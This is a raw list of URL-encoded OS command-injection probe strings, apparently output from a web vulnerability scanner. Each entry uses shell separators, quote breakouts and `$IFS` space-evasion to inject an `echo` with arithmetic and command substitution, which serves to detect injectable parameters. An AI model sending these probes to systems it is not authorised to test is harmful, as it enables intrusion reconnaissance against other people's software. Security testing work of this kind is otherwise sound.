+%20echo%20QKJRMZ$((93%2B3))$(echo%20QKJRMZ)QKJRMZ%26 +;echo%20ZQUXYY$((11%2B19))$(echo%20ZQUXYY)ZQUXYY%26 +&echo%20HATTRN$((28%2B69))$(echo%20HATTRN)HATTRN%26 +|echo%20ISAUQR$((2%2B13))$(echo%20ISAUQR)ISAUQR%26 +||echo%20UOPEHO$((55%2B30))$(echo%20UOPEHO)UOPEHO%26 +&&echo%20VGPHAP$((62%2B79))$(echo%20VGPHAP)VGPHAP%26 +%0aecho%20KWAWXC$((47%2B31))$(echo%20KWAWXC)KWAWXC%26 +%3Becho%20DNATLQ$((29%2B55))$(echo%20DNATLQ)DNATLQ%26 +%26echo%20GICKYF$((34%2B87))$(echo%20GICKYF)GICKYF%26 +%26%26echo%20ZEPMBC$((82%2B3))$(echo%20ZEPMBC)ZEPMBC%26 +%7Cecho%20QDGJFF$((4%2B21))$(echo%20QDGJFF)QDGJFF%26 +%7C%7Cecho%20QCTOMN$((80%2B24))$(echo%20QCTOMN)QCTOMN%26 +echo%20GXOGIA$((9%2B37))$(echo%20GXOGIA)GXOGIA%7C +%20echo%20OQZVWP$((28%2B27))$(echo%20OQZVWP)OQZVWP%7C +;echo%20TFWHBO$((48%2B78))$(echo%20TFWHBO)TFWHBO%7C +&echo%20TEOUXN$((44%2B11))$(echo%20TEOUXN)TEOUXN%7C +|echo%20SVSMOA$((21%2B73))$(echo%20SVSMOA)SVSMOA%7C +||echo%20TVGLAW$((25%2B16))$(echo%20TVGLAW)TVGLAW%7C +&&echo%20YJBIEJ$((20%2B48))$(echo%20YJBIEJ)YJBIEJ%7C +%0aecho%20VXXNDX$((4%2B53))$(echo%20VXXNDX)VXXNDX%7C +%3Becho%20OVSKJI$((16%2B53))$(echo%20OVSKJI)OVSKJI%7C +%26echo%20QWOBER$((53%2B15))$(echo%20QWOBER)QWOBER%7C +%26%26echo%20MVFPXA$((61%2B74))$(echo%20MVFPXA)MVFPXA%7C +%7Cecho%20JQVRWN$((97%2B95))$(echo%20JQVRWN)JQVRWN%7C +%7C%7Cecho%20FGCEYJ$((57%2B45))$(echo%20FGCEYJ)FGCEYJ%7C +%26echo%20LQDBIP$((97%2B15))$(echo%20LQDBIP)LQDBIP +%26%20echo%20QJINVP$((61%2B57))$(echo%20QJINVP)QJINVP +;echo%20OXGNMX$((41%2B15))$(echo%20OXGNMX)OXGNMX +&echo%20JDWSVZ$((58%2B52))$(echo%20JDWSVZ)JDWSVZ +|echo%20PVFIQF$((0%2B23))$(echo%20PVFIQF)PVFIQF +||echo%20KBFRKR$((35%2B98))$(echo%20KBFRKR)KBFRKR +&&echo%20WFUVSV$((8%2B81))$(echo%20WFUVSV)WFUVSV +%0aecho%20KYCGWH$((95%2B3))$(echo%20KYCGWH)KYCGWH +%3Becho%20OOBLUU$((57%2B95))$(echo%20OOBLUU)OOBLUU +%26echo%20AAKQAO$((78%2B60))$(echo%20AAKQAO)AAKQAO +%26%26echo%20KSNQJR$((81%2B61))$(echo%20KSNQJR)KSNQJR +%7Cecho%20TDQPPJ$((73%2B90))$(echo%20TDQPPJ)TDQPPJ +%7C%7Cecho%20CHJQTG$((39%2B34))$(echo%20CHJQTG)CHJQTG +echo%20NXONQU$((86%2B15))$(echo%20NXONQU)NXONQU' +%20echo%20MGXQDS$((94%2B23))$(echo%20MGXQDS)MGXQDS' +;echo%20STJJEN$((67%2B8))$(echo%20STJJEN)STJJEN' +&echo%20RCBRLG$((15%2B16))$(echo%20RCBRLG)RCBRLG' +|echo%20JQKYOJ$((43%2B35))$(echo%20JQKYOJ)JQKYOJ' +||echo%20VYZGPJ$((27%2B25))$(echo%20VYZGPJ)VYZGPJ' +&&echo%20QVCFLS$((84%2B30))$(echo%20QVCFLS)QVCFLS' +%0aecho%20TXQFBT$((39%2B43))$(echo%20TXQFBT)TXQFBT' +%3Becho%20YGSTDU$((3%2B28))$(echo%20YGSTDU)YGSTDU' +%26echo%20QFACMV$((19%2B23))$(echo%20QFACMV)QFACMV' +%26%26echo%20TWFPKP$((59%2B90))$(echo%20TWFPKP)TWFPKP' +%7Cecho%20EBRXMB$((11%2B49))$(echo%20EBRXMB)EBRXMB' +%7C%7Cecho%20VIYVBR$((79%2B51))$(echo%20VIYVBR)VIYVBR' +echo%20BRRGHV$((59%2B39))$(echo%20BRRGHV)BRRGHV" +%20echo%20DRLNDB$((45%2B12))$(echo%20DRLNDB)DRLNDB" +;echo%20BOSXTS$((61%2B2))$(echo%20BOSXTS)BOSXTS" +&echo%20TIIEEY$((36%2B32))$(echo%20TIIEEY)TIIEEY" +|echo%20QQBCQL$((54%2B23))$(echo%20QQBCQL)QQBCQL" +||echo%20EGVZBX$((88%2B98))$(echo%20EGVZBX)EGVZBX" +&&echo%20KPFBCT$((17%2B12))$(echo%20KPFBCT)KPFBCT" +%0aecho%20BLZAZS$((67%2B95))$(echo%20BLZAZS)BLZAZS" +%3Becho%20CWGSJV$((66%2B67))$(echo%20CWGSJV)CWGSJV" +%26echo%20EGLUMP$((59%2B73))$(echo%20EGLUMP)EGLUMP" +%26%26echo%20NDMYPS$((48%2B41))$(echo%20NDMYPS)NDMYPS" +%7Cecho%20VHYHSQ$((46%2B81))$(echo%20VHYHSQ)VHYHSQ" +%7C%7Cecho%20GLTVHA$((47%2B68))$(echo%20GLTVHA)GLTVHA" +echo%20OUEOUN$((36%2B63))$(echo%20OUEOUN)OUEOUN +%20echo%20YPGHYO$((29%2B85))$(echo%20YPGHYO)YPGHYO +;echo%20UKKXOY$((15%2B70))$(echo%20UKKXOY)UKKXOY +&echo%20TDKYEQ$((93%2B40))$(echo%20TDKYEQ)TDKYEQ +|echo%20DHCFMD$((19%2B7))$(echo%20DHCFMD)DHCFMD +||echo%20QLNCNS$((54%2B0))$(echo%20QLNCNS)QLNCNS +&&echo%20HJTQXE$((5%2B51))$(echo%20HJTQXE)HJTQXE +%0aecho%20UFXVBT$((19%2B18))$(echo%20UFXVBT)UFXVBT +%3Becho%20SKJOIJ$((68%2B83))$(echo%20SKJOIJ)SKJOIJ +%26echo%20PSQPBU$((10%2B52))$(echo%20PSQPBU)PSQPBU +%26%26echo%20YQCCXV$((3%2B76))$(echo%20YQCCXV)YQCCXV +%7Cecho%20UQHUGC$((5%2B71))$(echo%20UQHUGC)UQHUGC +%7C%7Cecho%20FKMVVE$((10%2B58))$(echo%20FKMVVE)FKMVVE +echo%20RSCBOB$((85%2B25))$(echo%20RSCBOB)RSCBOB// +%20echo%20PJVHQL$((20%2B65))$(echo%20PJVHQL)PJVHQL// +;echo%20FTUKUF$((89%2B93))$(echo%20FTUKUF)FTUKUF// +&echo%20XYNJUX$((85%2B41))$(echo%20XYNJUX)XYNJUX// +|echo%20HODOEM$((87%2B81))$(echo%20HODOEM)HODOEM// +||echo%20AYKDNR$((62%2B16))$(echo%20AYKDNR)AYKDNR// +&&echo%20BDNTCM$((25%2B80))$(echo%20BDNTCM)BDNTCM// +%0aecho%20GOYPAH$((75%2B21))$(echo%20GOYPAH)GOYPAH// +%3Becho%20MHISGE$((85%2B13))$(echo%20MHISGE)MHISGE// +%26echo%20JCPTZR$((19%2B12))$(echo%20JCPTZR)JCPTZR// +%26%26echo%20ZHQBQS$((72%2B22))$(echo%20ZHQBQS)ZHQBQS// +%7Cecho%20DRBQLH$((57%2B13))$(echo%20DRBQLH)DRBQLH// +%7C%7Cecho%20GGJYSE$((67%2B63))$(echo%20GGJYSE)GGJYSE// +echo%20HVYPWJ$((15%2B1))$(echo%20HVYPWJ)HVYPWJ\ +%20echo%20NCMPJP$((69%2B98))$(echo%20NCMPJP)NCMPJP\ +;echo%20EKHLZG$((64%2B29))$(echo%20EKHLZG)EKHLZG\ +&echo%20JYGQCN$((44%2B48))$(echo%20JYGQCN)JYGQCN\ +|echo%20SUVOTB$((44%2B30))$(echo%20SUVOTB)SUVOTB\ +||echo%20KPNBST$((18%2B29))$(echo%20KPNBST)KPNBST\ +&&echo%20RBCZEH$((34%2B18))$(echo%20RBCZEH)RBCZEH\ +%0aecho%20SJTIHB$((1%2B37))$(echo%20SJTIHB)SJTIHB\ +%3Becho%20RXPYLT$((92%2B26))$(echo%20RXPYLT)RXPYLT\ +%26echo%20UQBVZS$((49%2B88))$(echo%20UQBVZS)UQBVZS\ +%26%26echo%20SJDKJV$((54%2B71))$(echo%20SJDKJV)SJDKJV\ +%7Cecho%20PHLZMC$((98%2B93))$(echo%20PHLZMC)PHLZMC\ +%7C%7Cecho%20OXPIUV$((55%2B69))$(echo%20OXPIUV)OXPIUV\ +echo%20LBGSCB$((75%2B53))$(echo%20LBGSCB)LBGSCB& +%20echo%20VAAVBM$((40%2B49))$(echo%20VAAVBM)VAAVBM& +;echo%20UWAPJX$((78%2B84))$(echo%20UWAPJX)UWAPJX& +&echo%20QSELIT$((42%2B46))$(echo%20QSELIT)QSELIT& +|echo%20GBNBXF$((98%2B4))$(echo%20GBNBXF)GBNBXF& +||echo%20KKWMUH$((89%2B92))$(echo%20KKWMUH)KKWMUH& +&&echo%20CNCBLT$((66%2B98))$(echo%20CNCBLT)CNCBLT& +%0aecho%20WOLMWS$((65%2B25))$(echo%20WOLMWS)WOLMWS& +%3Becho%20ZUILRB$((40%2B52))$(echo%20ZUILRB)ZUILRB& +%26echo%20TBCUEY$((8%2B42))$(echo%20TBCUEY)TBCUEY& +%26%26echo%20BMKZQV$((89%2B7))$(echo%20BMKZQV)BMKZQV& +%7Cecho%20RWGJZW$((36%2B73))$(echo%20RWGJZW)RWGJZW& +%7C%7Cecho%20KXJBTF$((63%2B25))$(echo%20KXJBTF)KXJBTF& +echo%20NRIFAB$((13%2B88))$(echo%20NRIFAB)NRIFAB| +%20echo%20IOJYKG$((10%2B79))$(echo%20IOJYKG)IOJYKG| +;echo%20KOAUAW$((33%2B36))$(echo%20KOAUAW)KOAUAW| +&echo%20WRYKIU$((34%2B68))$(echo%20WRYKIU)WRYKIU| +|echo%20KDOBDY$((28%2B82))$(echo%20KDOBDY)KDOBDY| +||echo%20LZGCEO$((29%2B11))$(echo%20LZGCEO)LZGCEO| +&&echo%20EOLZZI$((76%2B39))$(echo%20EOLZZI)EOLZZI| +%0aecho%20QLRSUP$((61%2B80))$(echo%20QLRSUP)QLRSUP| +%3Becho%20YGFETC$((86%2B48))$(echo%20YGFETC)YGFETC| +%26echo%20VLCTNG$((82%2B89))$(echo%20VLCTNG)VLCTNG| +%26%26echo%20TETKKY$((84%2B73))$(echo%20TETKKY)TETKKY| +%7Cecho%20RQGHQR$((90%2B57))$(echo%20RQGHQR)RQGHQR| +%7C%7Cecho%20CYXVMU$((24%2B36))$(echo%20CYXVMU)CYXVMU| +echo%20QFCALQ$((19%2B0))$(echo%20QFCALQ)QFCALQ%27 +%20echo%20VMEFKZ$((26%2B36))$(echo%20VMEFKZ)VMEFKZ%27 +;echo%20JBPPQK$((55%2B35))$(echo%20JBPPQK)JBPPQK%27 +&echo%20AUJZVK$((4%2B31))$(echo%20AUJZVK)AUJZVK%27 +|echo%20OBEPVB$((99%2B41))$(echo%20OBEPVB)OBEPVB%27 +||echo%20FCIAEL$((12%2B72))$(echo%20FCIAEL)FCIAEL%27 +&&echo%20HECZHW$((41%2B77))$(echo%20HECZHW)HECZHW%27 +%0aecho%20QUYIRT$((99%2B30))$(echo%20QUYIRT)QUYIRT%27 +%3Becho%20OKHPYH$((66%2B11))$(echo%20OKHPYH)OKHPYH%27 +%26echo%20SGEJFS$((3%2B63))$(echo%20SGEJFS)SGEJFS%27 +%26%26echo%20SLSODI$((22%2B77))$(echo%20SLSODI)SLSODI%27 +%7Cecho%20JZRWVD$((83%2B63))$(echo%20JZRWVD)JZRWVD%27 +%7C%7Cecho%20CKNPSQ$((65%2B36))$(echo%20CKNPSQ)CKNPSQ%27 +echo%20IXGIJZ$((51%2B13))$(echo%20IXGIJZ)IXGIJZ%22 +%20echo%20DWODRY$((85%2B90))$(echo%20DWODRY)DWODRY%22 +;echo%20YUCTUM$((64%2B59))$(echo%20YUCTUM)YUCTUM%22 +&echo%20GZHQMB$((76%2B23))$(echo%20GZHQMB)GZHQMB%22 +|echo%20MAVZWG$((0%2B81))$(echo%20MAVZWG)MAVZWG%22 +||echo%20YJAQPI$((25%2B18))$(echo%20YJAQPI)YJAQPI%22 +&&echo%20EVVYXO$((98%2B26))$(echo%20EVVYXO)EVVYXO%22 +%0aecho%20YKMXVM$((97%2B0))$(echo%20YKMXVM)YKMXVM%22 +%3Becho%20JSDBIM$((99%2B35))$(echo%20JSDBIM)JSDBIM%22 +%26echo%20TIRPSP$((59%2B67))$(echo%20TIRPSP)TIRPSP%22 +%26%26echo%20PZSPFJ$((63%2B85))$(echo%20PZSPFJ)PZSPFJ%22 +%7Cecho%20IWVQXP$((56%2B14))$(echo%20IWVQXP)IWVQXP%22 +%7C%7Cecho%20SEOPIT$((30%2B65))$(echo%20SEOPIT)SEOPIT%22 +echo%20NXXMYC$((83%2B4))$(echo%20NXXMYC)NXXMYC%5C%5C +%20echo%20UWIANE$((47%2B69))$(echo%20UWIANE)UWIANE%5C%5C +;echo%20VPNQXQ$((3%2B65))$(echo%20VPNQXQ)VPNQXQ%5C%5C +&echo%20UPPHYJ$((1%2B62))$(echo%20UPPHYJ)UPPHYJ%5C%5C +|echo%20KCPSNB$((82%2B19))$(echo%20KCPSNB)KCPSNB%5C%5C +||echo%20BDZWWB$((16%2B92))$(echo%20BDZWWB)BDZWWB%5C%5C +&&echo%20CYENPU$((54%2B11))$(echo%20CYENPU)CYENPU%5C%5C +%0aecho%20LKGEJU$((76%2B63))$(echo%20LKGEJU)LKGEJU%5C%5C +%3Becho%20SBGUSE$((30%2B27))$(echo%20SBGUSE)SBGUSE%5C%5C +%26echo%20CRIQOG$((34%2B52))$(echo%20CRIQOG)CRIQOG%5C%5C +%26%26echo%20BAHZUB$((39%2B52))$(echo%20BAHZUB)BAHZUB%5C%5C +%7Cecho%20DONSLV$((7%2B31))$(echo%20DONSLV)DONSLV%5C%5C +%7C%7Cecho%20XLRSQY$((12%2B78))$(echo%20XLRSQY)XLRSQY%5C%5C +echo%20KOGUZU$((35%2B4))$(echo%20KOGUZU)KOGUZU%2F%2F +%20echo%20ZUHEPR$((0%2B30))$(echo%20ZUHEPR)ZUHEPR%2F%2F +;echo%20FGXIGR$((59%2B62))$(echo%20FGXIGR)FGXIGR%2F%2F +&echo%20BVLJXS$((57%2B50))$(echo%20BVLJXS)BVLJXS%2F%2F +|echo%20YJGAOX$((31%2B49))$(echo%20YJGAOX)YJGAOX%2F%2F +||echo%20YLLPSR$((30%2B99))$(echo%20YLLPSR)YLLPSR%2F%2F +&&echo%20LZKRLE$((89%2B61))$(echo%20LZKRLE)LZKRLE%2F%2F +%0aecho%20LBEVAD$((90%2B55))$(echo%20LBEVAD)LBEVAD%2F%2F +%3Becho%20AXSYWN$((98%2B71))$(echo%20AXSYWN)AXSYWN%2F%2F +%26echo%20JVRRJE$((66%2B84))$(echo%20JVRRJE)JVRRJE%2F%2F +%26%26echo%20QOVHPK$((74%2B92))$(echo%20QOVHPK)QOVHPK%2F%2F +%7Cecho%20JQHGOG$((52%2B28))$(echo%20JQHGOG)JQHGOG%2F%2F +%7C%7Cecho%20ERPAKK$((2%2B34))$(echo%20ERPAKK)ERPAKK%2F%2F +echo%20EPELRS$((18%2B25))$(echo%20EPELRS)EPELRS%26 +%20echo%20GAZVPT$((45%2B89))$(echo%20GAZVPT)GAZVPT%26 +;echo%20SXXKOK$((57%2B8))$(echo%20SXXKOK)SXXKOK%26 +&echo%20DPZXBY$((14%2B0))$(echo%20DPZXBY)DPZXBY%26 +|echo%20LAPJLQ$((95%2B69))$(echo%20LAPJLQ)LAPJLQ%26 +||echo%20RZQOUE$((1%2B0))$(echo%20RZQOUE)RZQOUE%26 +&&echo%20DBWTGZ$((49%2B92))$(echo%20DBWTGZ)DBWTGZ%26 +%0aecho%20EMMLEG$((69%2B45))$(echo%20EMMLEG)EMMLEG%26 +%3Becho%20WQAPQR$((68%2B99))$(echo%20WQAPQR)WQAPQR%26 +%26echo%20KNTCFP$((68%2B73))$(echo%20KNTCFP)KNTCFP%26 +%26%26echo%20JCHUJJ$((46%2B0))$(echo%20JCHUJJ)JCHUJJ%26 +%7Cecho%20YHQVRJ$((39%2B41))$(echo%20YHQVRJ)YHQVRJ%26 +%7C%7Cecho%20WBGPIV$((75%2B82))$(echo%20WBGPIV)WBGPIV%26 +echo%20URWAUA$((68%2B21))$(echo%20URWAUA)URWAUA%7C +%20echo%20QCALON$((95%2B41))$(echo%20QCALON)QCALON%7C +;echo%20XJGFPU$((17%2B93))$(echo%20XJGFPU)XJGFPU%7C +&echo%20JNSOXA$((61%2B86))$(echo%20JNSOXA)JNSOXA%7C +|echo%20IVIYPT$((61%2B1))$(echo%20IVIYPT)IVIYPT%7C +||echo%20KTAZQG$((85%2B41))$(echo%20KTAZQG)KTAZQG%7C +&&echo%20XTYKFU$((13%2B92))$(echo%20XTYKFU)XTYKFU%7C +%0aecho%20BPDPMT$((28%2B28))$(echo%20BPDPMT)BPDPMT%7C +%3Becho%20XJTEZA$((75%2B98))$(echo%20XJTEZA)XJTEZA%7C +%26echo%20FOXDLA$((60%2B49))$(echo%20FOXDLA)FOXDLA%7C +%26%26echo%20ONGWOM$((79%2B3))$(echo%20ONGWOM)ONGWOM%7C +%7Cecho%20VZDOKD$((12%2B24))$(echo%20VZDOKD)VZDOKD%7C +%7C%7Cecho%20XSXWGV$((71%2B98))$(echo%20XSXWGV)XSXWGV%7C +echo$IFSYOOFMV$((62%2B55))$(echo$IFSYOOFMV)YOOFMV +%20echo%20HYDGEB$((71%2B9))$(echo%20HYDGEB)HYDGEB +;echo$IFSCGVCXZ$((66%2B61))$(echo$IFSCGVCXZ)CGVCXZ +&echo$IFSFFEUVI$((96%2B62))$(echo$IFSFFEUVI)FFEUVI +|echo$IFSTZERWA$((97%2B63))$(echo$IFSTZERWA)TZERWA +||echo$IFSECAVFZ$((36%2B1))$(echo$IFSECAVFZ)ECAVFZ +&&echo$IFSWKUYHB$((71%2B18))$(echo$IFSWKUYHB)WKUYHB +%0aecho$IFSUEAGEW$((73%2B31))$(echo$IFSUEAGEW)UEAGEW +%3Becho$IFSKIRJVA$((72%2B54))$(echo$IFSKIRJVA)KIRJVA +%26echo$IFSEYORRP$((46%2B13))$(echo$IFSEYORRP)EYORRP +%26%26echo$IFSZMBRNO$((77%2B76))$(echo$IFSZMBRNO)ZMBRNO +%7Cecho$IFSXCWWGK$((90%2B51))$(echo$IFSXCWWGK)XCWWGK +%7C%7Cecho$IFSHCECZD$((65%2B26))$(echo$IFSHCECZD)HCECZD +echo$IFSNZFJZC$((22%2B7))$(echo$IFSNZFJZC)NZFJZC' +%20echo%20FMIZIK$((70%2B3))$(echo%20FMIZIK)FMIZIK' +;echo$IFSSGAACL$((0%2B12))$(echo$IFSSGAACL)SGAACL' +&echo$IFSTKZMMA$((70%2B55))$(echo$IFSTKZMMA)TKZMMA' +|echo$IFSORMIGP$((36%2B81))$(echo$IFSORMIGP)ORMIGP' +||echo$IFSWTNYEV$((5%2B53))$(echo$IFSWTNYEV)WTNYEV' +&&echo$IFSUGBSBK$((46%2B64))$(echo$IFSUGBSBK)UGBSBK' +%0aecho$IFSZOHJGD$((19%2B47))$(echo$IFSZOHJGD)ZOHJGD' +%3Becho$IFSWFUSQI$((24%2B11))$(echo$IFSWFUSQI)WFUSQI' +%26echo$IFSJADCHB$((6%2B80))$(echo$IFSJADCHB)JADCHB' +%26%26echo$IFSDKBFUT$((7%2B8))$(echo$IFSDKBFUT)DKBFUT' +%7Cecho$IFSMDQUDE$((92%2B96))$(echo$IFSMDQUDE)MDQUDE' +%7C%7Cecho$IFSJOEJNW$((26%2B59))$(echo$IFSJOEJNW)JOEJNW' +echo$IFSDYARGF$((39%2B79))$(echo$IFSDYARGF)DYARGF" +%20echo%20NKOHBN$((96%2B64))$(echo%20NKOHBN)NKOHBN" +;echo$IFSQKZBJP$((23%2B59))$(echo$IFSQKZBJP)QKZBJP" +&echo$IFSZIGKVR$((87%2B20))$(echo$IFSZIGKVR)ZIGKVR" +|echo$IFSDJJNIK$((63%2B58))$(echo$IFSDJJNIK)DJJNIK" +||echo$IFSRONZCJ$((41%2B90))$(echo$IFSRONZCJ)RONZCJ" +&&echo$IFSPDNJNK$((22%2B74))$(echo$IFSPDNJNK)PDNJNK" +%0aecho$IFSBNKFRX$((81%2B19))$(echo$IFSBNKFRX)BNKFRX" +%3Becho$IFSRWNIHZ$((72%2B65))$(echo$IFSRWNIHZ)RWNIHZ" +%26echo$IFSUXIQZJ$((27%2B95))$(echo$IFSUXIQZJ)UXIQZJ" +%26%26echo$IFSAZHTSE$((68%2B19))$(echo$IFSAZHTSE)AZHTSE" +%7Cecho$IFSAISDYW$((74%2B90))$(echo$IFSAISDYW)AISDYW" +%7C%7Cecho$IFSFFZLXA$((31%2B49))$(echo$IFSFFZLXA)FFZLXA" +echo$IFSIZVWCK$((54%2B72))$(echo$IFSIZVWCK)IZVWCK +%20echo%20KBNMCF$((63%2B18))$(echo%20KBNMCF)KBNMCF +;echo$IFSCHWBLL$((41%2B95))$(echo$IFSCHWBLL)CHWBLL +&echo$IFSXMFEYV$((86%2B73))$(echo$IFSXMFEYV)XMFEYV +|echo$IFSJBIOND$((76%2B13))$(echo$IFSJBIOND)JBIOND +||echo$IFSCVUUDY$((8%2B8))$(echo$IFSCVUUDY)CVUUDY +&&echo$IFSNOYZQL$((99%2B8))$(echo$IFSNOYZQL)NOYZQL +%0aecho$IFSZZKJNZ$((11%2B6))$(echo$IFSZZKJNZ)ZZKJNZ +%3Becho$IFSBLFIWK$((29%2B79))$(echo$IFSBLFIWK)BLFIWK +%26echo$IFSKZMAVH$((10%2B87))$(echo$IFSKZMAVH)KZMAVH +%26%26echo$IFSXGZTXT$((91%2B40))$(echo$IFSXGZTXT)XGZTXT +%7Cecho$IFSMYOWIL$((79%2B10))$(echo$IFSMYOWIL)MYOWIL +%7C%7Cecho$IFSLCASZZ$((36%2B54))$(echo$IFSLCASZZ)LCASZZ +echo$IFSGEYHDT$((98%2B13))$(echo$IFSGEYHDT)GEYHDT// +%20echo%20ZDHFWD$((74%2B46))$(echo%20ZDHFWD)ZDHFWD// +;echo$IFSWSRCRX$((45%2B83))$(echo$IFSWSRCRX)WSRCRX// +&echo$IFSUTUDJC$((16%2B78))$(echo$IFSUTUDJC)UTUDJC// +|echo$IFSXDYAKY$((50%2B55))$(echo$IFSXDYAKY)XDYAKY// +||echo$IFSURZLFH$((61%2B49))$(echo$IFSURZLFH)URZLFH// +&&echo$IFSPZLWHM$((84%2B59))$(echo$IFSPZLWHM)PZLWHM// +%0aecho$IFSRNGRKM$((66%2B9))$(echo$IFSRNGRKM)RNGRKM// +%3Becho$IFSMGNUUK$((47%2B60))$(echo$IFSMGNUUK)MGNUUK// +%26echo$IFSZNUBXF$((96%2B1))$(echo$IFSZNUBXF)ZNUBXF// +%26%26echo$IFSLOYHDY$((15%2B20))$(echo$IFSLOYHDY)LOYHDY// +%7Cecho$IFSVVVVVP$((21%2B21))$(echo$IFSVVVVVP)VVVVVP// +%7C%7Cecho$IFSJDZYWS$((14%2B65))$(echo$IFSJDZYWS)JDZYWS// +echo$IFSBLWDWQ$((23%2B19))$(echo$IFSBLWDWQ)BLWDWQ\ +%20echo%20HNHGPN$((18%2B32))$(echo%20HNHGPN)HNHGPN\ +;echo$IFSJCPFVL$((55%2B99))$(echo$IFSJCPFVL)JCPFVL\ +&echo$IFSDZELLQ$((7%2B27))$(echo$IFSDZELLQ)DZELLQ\ +|echo$IFSDMNIBS$((2%2B86))$(echo$IFSDMNIBS)DMNIBS\ +||echo$IFSJNIADE$((97%2B6))$(echo$IFSJNIADE)JNIADE\ +&&echo$IFSPKOWIK$((48%2B16))$(echo$IFSPKOWIK)PKOWIK\ +%0aecho$IFSBYOTYG$((4%2B40))$(echo$IFSBYOTYG)BYOTYG\ +%3Becho$IFSXLTPVN$((45%2B86))$(echo$IFSXLTPVN)XLTPVN\ +%26echo$IFSNINVIO$((20%2B74))$(echo$IFSNINVIO)NINVIO\ +%26%26echo$IFSMUFURB$((94%2B1))$(echo$IFSMUFURB)MUFURB\ +%7Cecho$IFSWGMKFN$((19%2B9))$(echo$IFSWGMKFN)WGMKFN\ +%7C%7Cecho$IFSGYKBRP$((2%2B36))$(echo$IFSGYKBRP)GYKBRP\ +echo$IFSBCFSQL$((44%2B41))$(echo$IFSBCFSQL)BCFSQL& +%20echo%20EXSSVL$((23%2B38))$(echo%20EXSSVL)EXSSVL& +;echo$IFSFNTIKC$((99%2B9))$(echo$IFSFNTIKC)FNTIKC& +&echo$IFSCDQGLR$((84%2B68))$(echo$IFSCDQGLR)CDQGLR& +|echo$IFSIPMDQM$((24%2B45))$(echo$IFSIPMDQM)IPMDQM& +||echo$IFSXMUMCF$((41%2B92))$(echo$IFSXMUMCF)XMUMCF& +&&echo$IFSRINUBZ$((32%2B73))$(echo$IFSRINUBZ)RINUBZ& +%0aecho$IFSHFIVLV$((26%2B18))$(echo$IFSHFIVLV)HFIVLV& +%3Becho$IFSVJOZLQ$((35%2B89))$(echo$IFSVJOZLQ)VJOZLQ& +%26echo$IFSRBZNOQ$((4%2B13))$(echo$IFSRBZNOQ)RBZNOQ& +%26%26echo$IFSDGAVAR$((61%2B22))$(echo$IFSDGAVAR)DGAVAR& +%7Cecho$IFSIMXNSU$((31%2B19))$(echo$IFSIMXNSU)IMXNSU& +%7C%7Cecho$IFSPTDKZC$((94%2B78))$(echo$IFSPTDKZC)PTDKZC& +echo$IFSZFQEOG$((33%2B69))$(echo$IFSZFQEOG)ZFQEOG| +%20echo%20WBCZIC$((68%2B36))$(echo%20WBCZIC)WBCZIC| +;echo$IFSRFYMLA$((34%2B26))$(echo$IFSRFYMLA)RFYMLA| +&echo$IFSNCQFBP$((1%2B82))$(echo$IFSNCQFBP)NCQFBP| +|echo$IFSHOMJAN$((98%2B15))$(echo$IFSHOMJAN)HOMJAN| +||echo$IFSFWBTCO$((35%2B92))$(echo$IFSFWBTCO)FWBTCO| +&&echo$IFSRSHHHN$((76%2B74))$(echo$IFSRSHHHN)RSHHHN| +%0aecho$IFSLFCSIP$((11%2B52))$(echo$IFSLFCSIP)LFCSIP| +%3Becho$IFSSVGWCX$((39%2B64))$(echo$IFSSVGWCX)SVGWCX| +%26echo$IFSDNXBTT$((20%2B50))$(echo$IFSDNXBTT)DNXBTT| +%26%26echo$IFSBEYMPV$((1%2B26))$(echo$IFSBEYMPV)BEYMPV| +%7Cecho$IFSXBQKGF$((50%2B52))$(echo$IFSXBQKGF)XBQKGF| +%7C%7Cecho$IFSPNDELB$((5%2B40))$(echo$IFSPNDELB)PNDELB| +echo$IFSCXOURS$((94%2B53))$(echo$IFSCXOURS)CXOURS%27 +%20echo%20INJQRH$((6%2B71))$(echo%20INJQRH)INJQRH%27 +;echo$IFSQTUCLW$((99%2B59))$(echo$IFSQTUCLW)QTUCLW%27 +&echo$IFSELNTMF$((54%2B89))$(echo$IFSELNTMF)ELNTMF%27 +|echo$IFSSXSTPH$((13%2B95))$(echo$IFSSXSTPH)SXSTPH%27 +||echo$IFSNWCALI$((76%2B93))$(echo$IFSNWCALI)NWCALI%27 +&&echo$IFSPKZNVA$((74%2B55))$(echo$IFSPKZNVA)PKZNVA%27 +%0aecho$IFSIRGGOI$((52%2B59))$(echo$IFSIRGGOI)IRGGOI%27 +%3Becho$IFSBRMMWH$((16%2B74))$(echo$IFSBRMMWH)BRMMWH%27 +%26echo$IFSXOUJEA$((42%2B77))$(echo$IFSXOUJEA)XOUJEA%27 +%26%26echo$IFSHUXXMI$((11%2B6))$(echo$IFSHUXXMI)HUXXMI%27 +%7Cecho$IFSTOMLNP$((44%2B6))$(echo$IFSTOMLNP)TOMLNP%27 +%7C%7Cecho$IFSXRJUZC$((77%2B52))$(echo$IFSXRJUZC)XRJUZC%27 +echo$IFSYLWBCG$((49%2B32))$(echo$IFSYLWBCG)YLWBCG%22 +%20echo%20KHSDYB$((90%2B99))$(echo%20KHSDYB)KHSDYB%22 +;echo$IFSKYWEBG$((28%2B35))$(echo$IFSKYWEBG)KYWEBG%22 +&echo$IFSIREVYM$((76%2B29))$(echo$IFSIREVYM)IREVYM%22 +|echo$IFSYOCGJF$((96%2B37))$(echo$IFSYOCGJF)YOCGJF%22 +||echo$IFSTLJWZW$((6%2B13))$(echo$IFSTLJWZW)TLJWZW%22 +&&echo$IFSFQYHVF$((35%2B20))$(echo$IFSFQYHVF)FQYHVF%22 +%0aecho$IFSBXCEBE$((79%2B33))$(echo$IFSBXCEBE)BXCEBE%22 +%3Becho$IFSIHCKXN$((49%2B14))$(echo$IFSIHCKXN)IHCKXN%22 +%26echo$IFSUDHXJK$((28%2B24))$(echo$IFSUDHXJK)UDHXJK%22 +%26%26echo$IFSXMOMPZ$((26%2B20))$(echo$IFSXMOMPZ)XMOMPZ%22 +%7Cecho$IFSLFROFF$((34%2B43))$(echo$IFSLFROFF)LFROFF%22 +%7C%7Cecho$IFSVRKQRS$((64%2B26))$(echo$IFSVRKQRS)VRKQRS%22 +echo$IFSPQLHVF$((2%2B67))$(echo$IFSPQLHVF)PQLHVF%5C%5C +%20echo%20ZRVFNO$((8%2B89))$(echo%20ZRVFNO)ZRVFNO%5C%5C +;echo$IFSXHQGTT$((9%2B46))$(echo$IFSXHQGTT)XHQGTT%5C%5C +&echo$IFSRITAKD$((40%2B96))$(echo$IFSRITAKD)RITAKD%5C%5C +|echo$IFSZIARXP$((32%2B15))$(echo$IFSZIARXP)ZIARXP%5C%5C 